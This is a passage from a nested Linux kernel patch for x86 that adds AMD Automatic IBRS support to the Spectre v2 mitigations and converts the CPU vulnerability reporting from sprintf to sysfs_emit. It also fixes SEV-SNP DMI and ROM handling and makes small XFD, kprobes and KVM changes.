+-	 * so allow for STIBP to be selected in that case.
++	 * to userspace.  AMD Automatic IBRS also does not protect userspace.
++	 * These modes therefore disable the implicit cross-thread protection,
++	 * so allow for STIBP to be selected in those cases.
+ 	 */
+ 	if (!boot_cpu_has(X86_FEATURE_STIBP) ||
+ 	    !smt_possible ||
+-	    spectre_v2_in_eibrs_mode(spectre_v2_enabled))
++	    (spectre_v2_in_eibrs_mode(spectre_v2_enabled) &&
++	     !boot_cpu_has(X86_FEATURE_AUTOIBRS)))
+ 		return;
+ 
+ 	/*
+@@ -1396,9 +1398,9 @@ static const char * const spectre_v2_strings[] = {
+ 	[SPECTRE_V2_NONE]			= "Vulnerable",
+ 	[SPECTRE_V2_RETPOLINE]			= "Mitigation: Retpolines",
+ 	[SPECTRE_V2_LFENCE]			= "Mitigation: LFENCE",
+-	[SPECTRE_V2_EIBRS]			= "Mitigation: Enhanced IBRS",
+-	[SPECTRE_V2_EIBRS_LFENCE]		= "Mitigation: Enhanced IBRS + LFENCE",
+-	[SPECTRE_V2_EIBRS_RETPOLINE]		= "Mitigation: Enhanced IBRS + Retpolines",
++	[SPECTRE_V2_EIBRS]			= "Mitigation: Enhanced / Automatic IBRS",
++	[SPECTRE_V2_EIBRS_LFENCE]		= "Mitigation: Enhanced / Automatic IBRS + LFENCE",
++	[SPECTRE_V2_EIBRS_RETPOLINE]		= "Mitigation: Enhanced / Automatic IBRS + Retpolines",
+ 	[SPECTRE_V2_IBRS]			= "Mitigation: IBRS",
+ };
+ 
+@@ -1467,7 +1469,7 @@ static enum spectre_v2_mitigation_cmd __init spectre_v2_parse_cmdline(void)
+ 	     cmd == SPECTRE_V2_CMD_EIBRS_LFENCE ||
+ 	     cmd == SPECTRE_V2_CMD_EIBRS_RETPOLINE) &&
+ 	    !boot_cpu_has(X86_FEATURE_IBRS_ENHANCED)) {
+-		pr_err("%s selected but CPU doesn't have eIBRS. Switching to AUTO select\n",
++		pr_err("%s selected but CPU doesn't have Enhanced or Automatic IBRS. Switching to AUTO select\n",
+ 		       mitigation_options[i].option);
+ 		return SPECTRE_V2_CMD_AUTO;
+ 	}
+@@ -1652,8 +1654,12 @@ static void __init spectre_v2_select_mitigation(void)
+ 		pr_err(SPECTRE_V2_EIBRS_EBPF_MSG);
+ 
+ 	if (spectre_v2_in_ibrs_mode(mode)) {
+-		x86_spec_ctrl_base |= SPEC_CTRL_IBRS;
+-		update_spec_ctrl(x86_spec_ctrl_base);
++		if (boot_cpu_has(X86_FEATURE_AUTOIBRS)) {
++			msr_set_bit(MSR_EFER, _EFER_AUTOIBRS);
++		} else {
++			x86_spec_ctrl_base |= SPEC_CTRL_IBRS;
++			update_spec_ctrl(x86_spec_ctrl_base);
++		}
+ 	}
+ 
+ 	switch (mode) {
+@@ -1737,8 +1743,8 @@ static void __init spectre_v2_select_mitigation(void)
+ 	/*
+ 	 * Retpoline protects the kernel, but doesn't protect firmware.  IBRS
+ 	 * and Enhanced IBRS protect firmware too, so enable IBRS around
+-	 * firmware calls only when IBRS / Enhanced IBRS aren't otherwise
+-	 * enabled.
++	 * firmware calls only when IBRS / Enhanced / Automatic IBRS aren't
++	 * otherwise enabled.
+ 	 *
+ 	 * Use "mode" to check Enhanced IBRS instead of boot_cpu_has(), because
+ 	 * the user might select retpoline on the kernel command line and if
+@@ -2568,74 +2574,74 @@ static const char * const l1tf_vmx_states[] = {
+ static ssize_t l1tf_show_state(char *buf)
+ {
+ 	if (l1tf_vmx_mitigation == VMENTER_L1D_FLUSH_AUTO)
+-		return sprintf(buf, "%s\n", L1TF_DEFAULT_MSG);
++		return sysfs_emit(buf, "%s\n", L1TF_DEFAULT_MSG);
+ 
+ 	if (l1tf_vmx_mitigation == VMENTER_L1D_FLUSH_EPT_DISABLED ||
+ 	    (l1tf_vmx_mitigation == VMENTER_L1D_FLUSH_NEVER &&
+ 	     sched_smt_active())) {
+-		return sprintf(buf, "%s; VMX: %s\n", L1TF_DEFAULT_MSG,
+-			       l1tf_vmx_states[l1tf_vmx_mitigation]);
++		return sysfs_emit(buf, "%s; VMX: %s\n", L1TF_DEFAULT_MSG,
++				  l1tf_vmx_states[l1tf_vmx_mitigation]);
+ 	}
+ 
+-	return sprintf(buf, "%s; VMX: %s, SMT %s\n", L1TF_DEFAULT_MSG,
+-		       l1tf_vmx_states[l1tf_vmx_mitigation],
+-		       sched_smt_active() ? "vulnerable" : "disabled");
++	return sysfs_emit(buf, "%s; VMX: %s, SMT %s\n", L1TF_DEFAULT_MSG,
++			  l1tf_vmx_states[l1tf_vmx_mitigation],
++			  sched_smt_active() ? "vulnerable" : "disabled");
+ }
+ 
+ static ssize_t itlb_multihit_show_state(char *buf)
+ {
+ 	if (!boot_cpu_has(X86_FEATURE_MSR_IA32_FEAT_CTL) ||
+ 	    !boot_cpu_has(X86_FEATURE_VMX))
+-		return sprintf(buf, "KVM: Mitigation: VMX unsupported\n");
++		return sysfs_emit(buf, "KVM: Mitigation: VMX unsupported\n");
+ 	else if (!(cr4_read_shadow() & X86_CR4_VMXE))
+-		return sprintf(buf, "KVM: Mitigation: VMX disabled\n");
++		return sysfs_emit(buf, "KVM: Mitigation: VMX disabled\n");
+ 	else if (itlb_multihit_kvm_mitigation)
+-		return sprintf(buf, "KVM: Mitigation: Split huge pages\n");
++		return sysfs_emit(buf, "KVM: Mitigation: Split huge pages\n");
+ 	else
+-		return sprintf(buf, "KVM: Vulnerable\n");
++		return sysfs_emit(buf, "KVM: Vulnerable\n");
+ }
+ #else
+ static ssize_t l1tf_show_state(char *buf)
+ {
+-	return sprintf(buf, "%s\n", L1TF_DEFAULT_MSG);
++	return sysfs_emit(buf, "%s\n", L1TF_DEFAULT_MSG);
+ }
+ 
+ static ssize_t itlb_multihit_show_state(char *buf)
+ {
+-	return sprintf(buf, "Processor vulnerable\n");
++	return sysfs_emit(buf, "Processor vulnerable\n");
+ }
+ #endif
+ 
+ static ssize_t mds_show_state(char *buf)
+ {
+ 	if (boot_cpu_has(X86_FEATURE_HYPERVISOR)) {
+-		return sprintf(buf, "%s; SMT Host state unknown\n",
+-			       mds_strings[mds_mitigation]);
++		return sysfs_emit(buf, "%s; SMT Host state unknown\n",
++				  mds_strings[mds_mitigation]);
+ 	}
+ 
+ 	if (boot_cpu_has(X86_BUG_MSBDS_ONLY)) {
+-		return sprintf(buf, "%s; SMT %s\n", mds_strings[mds_mitigation],
+-			       (mds_mitigation == MDS_MITIGATION_OFF ? "vulnerable" :
+-			        sched_smt_active() ? "mitigated" : "disabled"));
++		return sysfs_emit(buf, "%s; SMT %s\n", mds_strings[mds_mitigation],
++				  (mds_mitigation == MDS_MITIGATION_OFF ? "vulnerable" :
++				   sched_smt_active() ? "mitigated" : "disabled"));
+ 	}
+ 
+-	return sprintf(buf, "%s; SMT %s\n", mds_strings[mds_mitigation],
+-		       sched_smt_active() ? "vulnerable" : "disabled");
++	return sysfs_emit(buf, "%s; SMT %s\n", mds_strings[mds_mitigation],
++			  sched_smt_active() ? "vulnerable" : "disabled");
+ }
+ 
+ static ssize_t tsx_async_abort_show_state(char *buf)
+ {
+ 	if ((taa_mitigation == TAA_MITIGATION_TSX_DISABLED) ||
+ 	    (taa_mitigation == TAA_MITIGATION_OFF))
+-		return sprintf(buf, "%s\n", taa_strings[taa_mitigation]);
++		return sysfs_emit(buf, "%s\n", taa_strings[taa_mitigation]);
+ 
+ 	if (boot_cpu_has(X86_FEATURE_HYPERVISOR)) {
+-		return sprintf(buf, "%s; SMT Host state unknown\n",
+-			       taa_strings[taa_mitigation]);
++		return sysfs_emit(buf, "%s; SMT Host state unknown\n",
++				  taa_strings[taa_mitigation]);
+ 	}
+ 
+-	return sprintf(buf, "%s; SMT %s\n", taa_strings[taa_mitigation],
+-		       sched_smt_active() ? "vulnerable" : "disabled");
++	return sysfs_emit(buf, "%s; SMT %s\n", taa_strings[taa_mitigation],
++			  sched_smt_active() ? "vulnerable" : "disabled");
+ }
+ 
+ static ssize_t mmio_stale_data_show_state(char *buf)
+@@ -2662,7 +2668,8 @@ static ssize_t rfds_show_state(char *buf)
+ 
+ static char *stibp_state(void)
+ {
+-	if (spectre_v2_in_eibrs_mode(spectre_v2_enabled))
++	if (spectre_v2_in_eibrs_mode(spectre_v2_enabled) &&
++	    !boot_cpu_has(X86_FEATURE_AUTOIBRS))
+ 		return "";
+ 
+ 	switch (spectre_v2_user_stibp) {
+@@ -2708,47 +2715,46 @@ static char *pbrsb_eibrs_state(void)
+ static ssize_t spectre_v2_show_state(char *buf)
+ {
+ 	if (spectre_v2_enabled == SPECTRE_V2_LFENCE)
+-		return sprintf(buf, "Vulnerable: LFENCE\n");
++		return sysfs_emit(buf, "Vulnerable: LFENCE\n");
+ 
+ 	if (spectre_v2_enabled == SPECTRE_V2_EIBRS && unprivileged_ebpf_enabled())
+-		return sprintf(buf, "Vulnerable: eIBRS with unprivileged eBPF\n");
++		return sysfs_emit(buf, "Vulnerable: eIBRS with unprivileged eBPF\n");
+ 
+ 	if (sched_smt_active() && unprivileged_ebpf_enabled() &&
+ 	    spectre_v2_enabled == SPECTRE_V2_EIBRS_LFENCE)
+-		return sprintf(buf, "Vulnerable: eIBRS+LFENCE with unprivileged eBPF and SMT\n");
++		return sysfs_emit(buf, "Vulnerable: eIBRS+LFENCE with unprivileged eBPF and SMT\n");
+ 
+-	return sprintf(buf, "%s%s%s%s%s%s%s\n",
+-		       spectre_v2_strings[spectre_v2_enabled],
+-		       ibpb_state(),
+-		       boot_cpu_has(X86_FEATURE_USE_IBRS_FW) ? ", IBRS_FW" : "",
+-		       stibp_state(),
+-		       boot_cpu_has(X86_FEATURE_RSB_CTXSW) ? ", RSB filling" : "",
+-		       pbrsb_eibrs_state(),
+-		       spectre_v2_module_string());
++	return sysfs_emit(buf, "%s%s%s%s%s%s%s\n",
++			  spectre_v2_strings[spectre_v2_enabled],
++			  ibpb_state(),
++			  boot_cpu_has(X86_FEATURE_USE_IBRS_FW) ? ", IBRS_FW" : "",
++			  stibp_state(),
++			  boot_cpu_has(X86_FEATURE_RSB_CTXSW) ? ", RSB filling" : "",
++			  pbrsb_eibrs_state(),
++			  spectre_v2_module_string());
+ }
+ 
+ static ssize_t srbds_show_state(char *buf)
+ {
+-	return sprintf(buf, "%s\n", srbds_strings[srbds_mitigation]);
++	return sysfs_emit(buf, "%s\n", srbds_strings[srbds_mitigation]);
+ }
+ 
+ static ssize_t retbleed_show_state(char *buf)
+ {
+ 	if (retbleed_mitigation == RETBLEED_MITIGATION_UNRET ||
+ 	    retbleed_mitigation == RETBLEED_MITIGATION_IBPB) {
+-	    if (boot_cpu_data.x86_vendor != X86_VENDOR_AMD &&
+-		boot_cpu_data.x86_vendor != X86_VENDOR_HYGON)
+-		    return sprintf(buf, "Vulnerable: untrained return thunk / IBPB on non-AMD based uarch\n");
++		if (boot_cpu_data.x86_vendor != X86_VENDOR_AMD &&
++		    boot_cpu_data.x86_vendor != X86_VENDOR_HYGON)
++			return sysfs_emit(buf, "Vulnerable: untrained return thunk / IBPB on non-AMD based uarch\n");
+ 
+-	    return sprintf(buf, "%s; SMT %s\n",
+-			   retbleed_strings[retbleed_mitigation],
+-			   !sched_smt_active() ? "disabled" :
+-			   spectre_v2_user_stibp == SPECTRE_V2_USER_STRICT ||
+-			   spectre_v2_user_stibp == SPECTRE_V2_USER_STRICT_PREFERRED ?
+-			   "enabled with STIBP protection" : "vulnerable");
++		return sysfs_emit(buf, "%s; SMT %s\n", retbleed_strings[retbleed_mitigation],
++				  !sched_smt_active() ? "disabled" :
++				  spectre_v2_user_stibp == SPECTRE_V2_USER_STRICT ||
++				  spectre_v2_user_stibp == SPECTRE_V2_USER_STRICT_PREFERRED ?
++				  "enabled with STIBP protection" : "vulnerable");
+ 	}
+ 
+-	return sprintf(buf, "%s\n", retbleed_strings[retbleed_mitigation]);
++	return sysfs_emit(buf, "%s\n", retbleed_strings[retbleed_mitigation]);
+ }
+ 
+ static ssize_t gds_show_state(char *buf)
+@@ -2770,26 +2776,26 @@ static ssize_t cpu_show_common(struct device *dev, struct device_attribute *attr
+ 			       char *buf, unsigned int bug)
+ {
+ 	if (!boot_cpu_has_bug(bug))
+-		return sprintf(buf, "Not affected\n");
++		return sysfs_emit(buf, "Not affected\n");
+ 
+ 	switch (bug) {
+ 	case X86_BUG_CPU_MELTDOWN:
+ 		if (boot_cpu_has(X86_FEATURE_PTI))
+-			return sprintf(buf, "Mitigation: PTI\n");
++			return sysfs_emit(buf, "Mitigation: PTI\n");
+ 
+ 		if (hypervisor_is_type(X86_HYPER_XEN_PV))
+-			return sprintf(buf, "Unknown (XEN PV detected, hypervisor mitigation required)\n");
++			return sysfs_emit(buf, "Unknown (XEN PV detected, hypervisor mitigation required)\n");
+ 
+ 		break;
+ 
+ 	case X86_BUG_SPECTRE_V1:
+-		return sprintf(buf, "%s\n", spectre_v1_strings[spectre_v1_mitigation]);
++		return sysfs_emit(buf, "%s\n", spectre_v1_strings[spectre_v1_mitigation]);
+ 
+ 	case X86_BUG_SPECTRE_V2:
+ 		return spectre_v2_show_state(buf);
+ 
+ 	case X86_BUG_SPEC_STORE_BYPASS:
+-		return sprintf(buf, "%s\n", ssb_strings[ssb_mode]);
++		return sysfs_emit(buf, "%s\n", ssb_strings[ssb_mode]);
+ 
+ 	case X86_BUG_L1TF:
+ 		if (boot_cpu_has(X86_FEATURE_L1TF_PTEINV))
+@@ -2828,7 +2834,7 @@ static ssize_t cpu_show_common(struct device *dev, struct device_attribute *attr
+ 		break;
+ 	}
+ 
+-	return sprintf(buf, "Vulnerable\n");
++	return sysfs_emit(buf, "Vulnerable\n");
+ }
+ 
+ ssize_t cpu_show_meltdown(struct device *dev, struct device_attribute *attr, char *buf)
+diff --git a/arch/x86/kernel/cpu/common.c b/arch/x86/kernel/cpu/common.c
+index 758938c94b41e..ca243d7ba0ea5 100644
+--- a/arch/x86/kernel/cpu/common.c
++++ b/arch/x86/kernel/cpu/common.c
+@@ -1212,8 +1212,8 @@ static const __initconst struct x86_cpu_id cpu_vuln_whitelist[] = {
+ 	VULNWL_AMD(0x12,	NO_MELTDOWN | NO_SSB | NO_L1TF | NO_MDS | NO_SWAPGS | NO_ITLB_MULTIHIT | NO_MMIO),
+ 
+ 	/* FAMILY_ANY must be last, otherwise 0x0f - 0x12 matches won't work */
+-	VULNWL_AMD(X86_FAMILY_ANY,	NO_MELTDOWN | NO_L1TF | NO_MDS | NO_SWAPGS | NO_ITLB_MULTIHIT | NO_MMIO),
+-	VULNWL_HYGON(X86_FAMILY_ANY,	NO_MELTDOWN | NO_L1TF | NO_MDS | NO_SWAPGS | NO_ITLB_MULTIHIT | NO_MMIO),
++	VULNWL_AMD(X86_FAMILY_ANY,	NO_MELTDOWN | NO_L1TF | NO_MDS | NO_SWAPGS | NO_ITLB_MULTIHIT | NO_MMIO | NO_EIBRS_PBRSB),
++	VULNWL_HYGON(X86_FAMILY_ANY,	NO_MELTDOWN | NO_L1TF | NO_MDS | NO_SWAPGS | NO_ITLB_MULTIHIT | NO_MMIO | NO_EIBRS_PBRSB),
+ 
+ 	/* Zhaoxin Family 7 */
+ 	VULNWL(CENTAUR,	7, X86_MODEL_ANY,	NO_SPECTRE_V2 | NO_SWAPGS | NO_MMIO),
+@@ -1362,8 +1362,16 @@ static void __init cpu_set_bug_bits(struct cpuinfo_x86 *c)
+ 	   !cpu_has(c, X86_FEATURE_AMD_SSB_NO))
+ 		setup_force_cpu_bug(X86_BUG_SPEC_STORE_BYPASS);
+ 
+-	if (ia32_cap & ARCH_CAP_IBRS_ALL)
++	/*
++	 * AMD's AutoIBRS is equivalent to Intel's eIBRS - use the Intel feature
++	 * flag and protect from vendor-specific bugs via the whitelist.
++	 */
++	if ((ia32_cap & ARCH_CAP_IBRS_ALL) || cpu_has(c, X86_FEATURE_AUTOIBRS)) {
+ 		setup_force_cpu_cap(X86_FEATURE_IBRS_ENHANCED);
++		if (!cpu_matches(cpu_vuln_whitelist, NO_EIBRS_PBRSB) &&
++		    !(ia32_cap & ARCH_CAP_PBRSB_NO))
++			setup_force_cpu_bug(X86_BUG_EIBRS_PBRSB);
++	}
+ 
+ 	if (!cpu_matches(cpu_vuln_whitelist, NO_MDS) &&
+ 	    !(ia32_cap & ARCH_CAP_MDS_NO)) {
+@@ -1425,11 +1433,6 @@ static void __init cpu_set_bug_bits(struct cpuinfo_x86 *c)
+ 			setup_force_cpu_bug(X86_BUG_RETBLEED);
+ 	}
+ 
+-	if (cpu_has(c, X86_FEATURE_IBRS_ENHANCED) &&
+-	    !cpu_matches(cpu_vuln_whitelist, NO_EIBRS_PBRSB) &&
+-	    !(ia32_cap & ARCH_CAP_PBRSB_NO))
+-		setup_force_cpu_bug(X86_BUG_EIBRS_PBRSB);
+-
+ 	if (cpu_matches(cpu_vuln_blacklist, SMT_RSB))
+ 		setup_force_cpu_bug(X86_BUG_SMT_RSB);
+ 
+diff --git a/arch/x86/kernel/cpu/mshyperv.c b/arch/x86/kernel/cpu/mshyperv.c
+index 34d9e899e471e..9b039e9635e40 100644
+--- a/arch/x86/kernel/cpu/mshyperv.c
++++ b/arch/x86/kernel/cpu/mshyperv.c
+@@ -344,7 +344,7 @@ static void __init ms_hyperv_init_platform(void)
+ 		/* Isolation VMs are unenlightened SEV-based VMs, thus this check: */
+ 		if (IS_ENABLED(CONFIG_AMD_MEM_ENCRYPT)) {
+ 			if (hv_get_isolation_type() != HV_ISOLATION_TYPE_NONE)
+-				cc_set_vendor(CC_VENDOR_HYPERV);
++				cc_vendor = CC_VENDOR_HYPERV;
+ 		}
+ 	}
+ 
+diff --git a/arch/x86/kernel/eisa.c b/arch/x86/kernel/eisa.c
+index e963344b04490..53935b4d62e30 100644
+--- a/arch/x86/kernel/eisa.c
++++ b/arch/x86/kernel/eisa.c
+@@ -2,6 +2,7 @@
+ /*
+  * EISA specific code
+  */
++#include <linux/cc_platform.h>
+ #include <linux/ioport.h>
+ #include <linux/eisa.h>
+ #include <linux/io.h>
+@@ -12,7 +13,7 @@ static __init int eisa_bus_probe(void)
+ {
+ 	void __iomem *p;
+ 
+-	if (xen_pv_domain() && !xen_initial_domain())
++	if ((xen_pv_domain() && !xen_initial_domain()) || cc_platform_has(CC_ATTR_GUEST_SEV_SNP))
+ 		return 0;
+ 
+ 	p = ioremap(0x0FFFD9, 4);
+diff --git a/arch/x86/kernel/fpu/xstate.c b/arch/x86/kernel/fpu/xstate.c
+index ebe698f8af73b..2aa849705bb68 100644
+--- a/arch/x86/kernel/fpu/xstate.c
++++ b/arch/x86/kernel/fpu/xstate.c
+@@ -177,10 +177,11 @@ void fpu__init_cpu_xstate(void)
+ 	 * Must happen after CR4 setup and before xsetbv() to allow KVM
+ 	 * lazy passthrough.  Write independent of the dynamic state static
+ 	 * key as that does not work on the boot CPU. This also ensures
+-	 * that any stale state is wiped out from XFD.
++	 * that any stale state is wiped out from XFD. Reset the per CPU
++	 * xfd cache too.
+ 	 */
+ 	if (cpu_feature_enabled(X86_FEATURE_XFD))
+-		wrmsrl(MSR_IA32_XFD, init_fpstate.xfd);
++		xfd_set_state(init_fpstate.xfd);
+ 
+ 	/*
+ 	 * XCR_XFEATURE_ENABLED_MASK (aka. XCR0) sets user features
+diff --git a/arch/x86/kernel/fpu/xstate.h b/arch/x86/kernel/fpu/xstate.h
+index 3518fb26d06b0..19ca623ffa2ac 100644
+--- a/arch/x86/kernel/fpu/xstate.h
++++ b/arch/x86/kernel/fpu/xstate.h
+@@ -148,20 +148,26 @@ static inline void xfd_validate_state(struct fpstate *fpstate, u64 mask, bool rs
+ #endif
+ 
+ #ifdef CONFIG_X86_64
++static inline void xfd_set_state(u64 xfd)
++{
++	wrmsrl(MSR_IA32_XFD, xfd);
++	__this_cpu_write(xfd_state, xfd);
++}
++
+ static inline void xfd_update_state(struct fpstate *fpstate)
+ {
+ 	if (fpu_state_size_dynamic()) {
+ 		u64 xfd = fpstate->xfd;
+ 
+-		if (__this_cpu_read(xfd_state) != xfd) {
+-			wrmsrl(MSR_IA32_XFD, xfd);
+-			__this_cpu_write(xfd_state, xfd);
+-		}
++		if (__this_cpu_read(xfd_state) != xfd)
++			xfd_set_state(xfd);
+ 	}
+ }
+ 
+ extern int __xfd_enable_feature(u64 which, struct fpu_guest *guest_fpu);
+ #else
++static inline void xfd_set_state(u64 xfd) { }
++
+ static inline void xfd_update_state(struct fpstate *fpstate) { }
+ 
+ static inline int __xfd_enable_feature(u64 which, struct fpu_guest *guest_fpu) {
+diff --git a/arch/x86/kernel/kprobes/core.c b/arch/x86/kernel/kprobes/core.c
+index 6120f25b0d5cc..991f00c817e6c 100644
+--- a/arch/x86/kernel/kprobes/core.c
++++ b/arch/x86/kernel/kprobes/core.c
+@@ -301,7 +301,16 @@ static int can_probe(unsigned long paddr)
+ kprobe_opcode_t *arch_adjust_kprobe_addr(unsigned long addr, unsigned long offset,
+ 					 bool *on_func_entry)
+ {
+-	if (is_endbr(*(u32 *)addr)) {
++	u32 insn;
++
++	/*
++	 * Since 'addr' is not guaranteed to be safe to access, use
++	 * copy_from_kernel_nofault() to read the instruction:
++	 */
++	if (copy_from_kernel_nofault(&insn, (void *)addr, sizeof(u32)))
++		return NULL;
++
++	if (is_endbr(insn)) {
+ 		*on_func_entry = !offset || offset == 4;
+ 		if (*on_func_entry)
+ 			offset = 4;
+diff --git a/arch/x86/kernel/probe_roms.c b/arch/x86/kernel/probe_roms.c
+index 319fef37d9dce..cc2c34ba7228a 100644
+--- a/arch/x86/kernel/probe_roms.c
++++ b/arch/x86/kernel/probe_roms.c
+@@ -203,16 +203,6 @@ void __init probe_roms(void)
+ 	unsigned char c;
+ 	int i;
+ 
+-	/*
+-	 * The ROM memory range is not part of the e820 table and is therefore not
+-	 * pre-validated by BIOS. The kernel page table maps the ROM region as encrypted
+-	 * memory, and SNP requires encrypted memory to be validated before access.
+-	 * Do that here.
+-	 */
+-	snp_prep_memory(video_rom_resource.start,
+-			((system_rom_resource.end + 1) - video_rom_resource.start),
+-			SNP_PAGE_STATE_PRIVATE);
+-
+ 	/* video rom */
+ 	upper = adapter_rom_resources[0].start;
+ 	for (start = video_rom_resource.start; start < upper; start += 2048) {
+diff --git a/arch/x86/kernel/setup.c b/arch/x86/kernel/setup.c
+index 804a252382da7..d1ffac9ad611d 100644
+--- a/arch/x86/kernel/setup.c
++++ b/arch/x86/kernel/setup.c
+@@ -9,7 +9,6 @@
+ #include <linux/console.h>
+ #include <linux/crash_dump.h>
+ #include <linux/dma-map-ops.h>
+-#include <linux/dmi.h>
+ #include <linux/efi.h>
+ #include <linux/ima.h>
+ #include <linux/init_ohci1394_dma.h>
+@@ -1032,7 +1031,7 @@ void __init setup_arch(char **cmdline_p)
+ 	if (efi_enabled(EFI_BOOT))
+ 		efi_init();
+ 
+-	dmi_setup();
++	x86_init.resources.dmi_setup();
+ 
+ 	/*
+ 	 * VMware detection requires dmi to be available, so this
+diff --git a/arch/x86/kernel/sev-shared.c b/arch/x86/kernel/sev-shared.c
+index 71d8698702ce3..271e70d5748ef 100644
+--- a/arch/x86/kernel/sev-shared.c
++++ b/arch/x86/kernel/sev-shared.c
+@@ -553,9 +553,9 @@ static int snp_cpuid(struct ghcb *ghcb, struct es_em_ctxt *ctxt, struct cpuid_le
+ 		leaf->eax = leaf->ebx = leaf->ecx = leaf->edx = 0;
+ 
+ 		/* Skip post-processing for out-of-range zero leafs. */
+-		if (!(leaf->fn <= cpuid_std_range_max ||
+-		      (leaf->fn >= 0x40000000 && leaf->fn <= cpuid_hyp_range_max) ||
+-		      (leaf->fn >= 0x80000000 && leaf->fn <= cpuid_ext_range_max)))
++		if (!(leaf->fn <= RIP_REL_REF(cpuid_std_range_max) ||
++		      (leaf->fn >= 0x40000000 && leaf->fn <= RIP_REL_REF(cpuid_hyp_range_max)) ||
++		      (leaf->fn >= 0x80000000 && leaf->fn <= RIP_REL_REF(cpuid_ext_range_max))))
+ 			return 0;
+ 	}
+ 
+@@ -1060,10 +1060,10 @@ static void __init setup_cpuid_table(const struct cc_blob_sev_info *cc_info)
+ 		const struct snp_cpuid_fn *fn = &cpuid_table->fn[i];
+ 
+ 		if (fn->eax_in == 0x0)
+-			cpuid_std_range_max = fn->eax;
++			RIP_REL_REF(cpuid_std_range_max) = fn->eax;
+ 		else if (fn->eax_in == 0x40000000)
+-			cpuid_hyp_range_max = fn->eax;
++			RIP_REL_REF(cpuid_hyp_range_max) = fn->eax;
+ 		else if (fn->eax_in == 0x80000000)
+-			cpuid_ext_range_max = fn->eax;
++			RIP_REL_REF(cpuid_ext_range_max) = fn->eax;
+ 	}
+ }
+diff --git a/arch/x86/kernel/sev.c b/arch/x86/kernel/sev.c
+index c8dfb0fdde7f9..e35fcc8d4bae4 100644
+--- a/arch/x86/kernel/sev.c
++++ b/arch/x86/kernel/sev.c
+@@ -23,6 +23,7 @@
+ #include <linux/platform_device.h>
+ #include <linux/io.h>
+ #include <linux/psp-sev.h>
++#include <linux/dmi.h>
+ #include <uapi/linux/sev-guest.h>
+ 
+ #include <asm/cpu_entry_area.h>
+@@ -736,7 +737,7 @@ void __init early_snp_set_memory_private(unsigned long vaddr, unsigned long padd
+ 	 * This eliminates worries about jump tables or checking boot_cpu_data
+ 	 * in the cc_platform_has() function.
+ 	 */
+-	if (!(sev_status & MSR_AMD64_SEV_SNP_ENABLED))
++	if (!(RIP_REL_REF(sev_status) & MSR_AMD64_SEV_SNP_ENABLED))
+ 		return;
+ 
+ 	 /*
+@@ -758,7 +759,7 @@ void __init early_snp_set_memory_shared(unsigned long vaddr, unsigned long paddr
+ 	 * This eliminates worries about jump tables or checking boot_cpu_data
+ 	 * in the cc_platform_has() function.
+ 	 */
+-	if (!(sev_status & MSR_AMD64_SEV_SNP_ENABLED))
++	if (!(RIP_REL_REF(sev_status) & MSR_AMD64_SEV_SNP_ENABLED))
+ 		return;
+ 
+ 	/* Invalidate the memory pages before they are marked shared in the RMP table. */
+@@ -768,21 +769,6 @@ void __init early_snp_set_memory_shared(unsigned long vaddr, unsigned long paddr
+ 	early_set_pages_state(paddr, npages, SNP_PAGE_STATE_SHARED);
+ }
+ 
+-void __init snp_prep_memory(unsigned long paddr, unsigned int sz, enum psc_op op)
+-{
+-	unsigned long vaddr, npages;
+-
+-	vaddr = (unsigned long)__va(paddr);
+-	npages = PAGE_ALIGN(sz) >> PAGE_SHIFT;
+-
+-	if (op == SNP_PAGE_STATE_PRIVATE)
+-		early_snp_set_memory_private(vaddr, paddr, npages);
+-	else if (op == SNP_PAGE_STATE_SHARED)
+-		early_snp_set_memory_shared(vaddr, paddr, npages);
+-	else
+-		WARN(1, "invalid memory op %d\n", op);
+-}
+-
+ static int vmgexit_psc(struct snp_psc_desc *desc)
+ {
+ 	int cur_entry, end_entry, ret = 0;
+@@ -2152,6 +2138,17 @@ void __init __noreturn snp_abort(void)
+ 	sev_es_terminate(SEV_TERM_SET_GEN, GHCB_SNP_UNSUPPORTED);
+ }
+ 
++/*
++ * SEV-SNP guests should only execute dmi_setup() if EFI_CONFIG_TABLES are
++ * enabled, as the alternative (fallback) logic for DMI probing in the legacy
++ * ROM region can cause a crash since this region is not pre-validated.
++ */
++void __init snp_dmi_setup(void)
++{
++	if (efi_enabled(EFI_CONFIG_TABLES))
++		dmi_setup();
++}
++
+ static void dump_cpuid_table(void)
+ {
+ 	const struct snp_cpuid_table *cpuid_table = snp_cpuid_get_table();
+diff --git a/arch/x86/kernel/x86_init.c b/arch/x86/kernel/x86_init.c
+index 41e5b4cb898c3..a4a921b9e6646 100644
+--- a/arch/x86/kernel/x86_init.c
++++ b/arch/x86/kernel/x86_init.c
+@@ -3,6 +3,7 @@
+  *
+  *  For licencing details see kernel-base/COPYING
+  */
++#include <linux/dmi.h>
+ #include <linux/init.h>
+ #include <linux/ioport.h>
+ #include <linux/export.h>
+@@ -66,6 +67,7 @@ struct x86_init_ops x86_init __initdata = {
+ 		.probe_roms		= probe_roms,
+ 		.reserve_resources	= reserve_standard_io_resources,
+ 		.memory_setup		= e820__memory_setup_default,
++		.dmi_setup		= dmi_setup,
+ 	},
+ 
+ 	.mpparse = {
+diff --git a/arch/x86/kvm/cpuid.c b/arch/x86/kvm/cpuid.c
+index c3ef1fc602bf9..62a44455c51d0 100644
+--- a/arch/x86/kvm/cpuid.c
++++ b/arch/x86/kvm/cpuid.c
+@@ -535,9 +535,9 @@ static __always_inline void __kvm_cpu_cap_mask(unsigned int leaf)
+ }
+ 
+ static __always_inline
+-void kvm_cpu_cap_init_scattered(enum kvm_only_cpuid_leafs leaf, u32 mask)
++void kvm_cpu_cap_init_kvm_defined(enum kvm_only_cpuid_leafs leaf, u32 mask)
+ {
+-	/* Use kvm_cpu_cap_mask for non-scattered leafs. */
++	/* Use kvm_cpu_cap_mask for leafs that aren't KVM-only. */
+ 	BUILD_BUG_ON(leaf < NCAPINTS);
+ 
+ 	kvm_cpu_caps[leaf] = mask;
+@@ -547,7 +547,7 @@ void kvm_cpu_cap_init_scattered(enum kvm_only_cpuid_leafs leaf, u32 mask)
+ 
+ static __always_inline void kvm_cpu_cap_mask(enum cpuid_leafs leaf, u32 mask)
+ {
+-	/* Use kvm_cpu_cap_init_scattered for scattered leafs. */
++	/* Use kvm_cpu_cap_init_kvm_defined for KVM-only leafs. */
+ 	BUILD_BUG_ON(leaf >= NCAPINTS);
+ 
+ 	kvm_cpu_caps[leaf] &= mask;
+@@ -652,11 +652,16 @@ void kvm_set_cpu_caps(void)
+ 		F(AVX_VNNI) | F(AVX512_BF16)
+ 	);
+ 
++	kvm_cpu_cap_init_kvm_defined(CPUID_7_2_EDX,
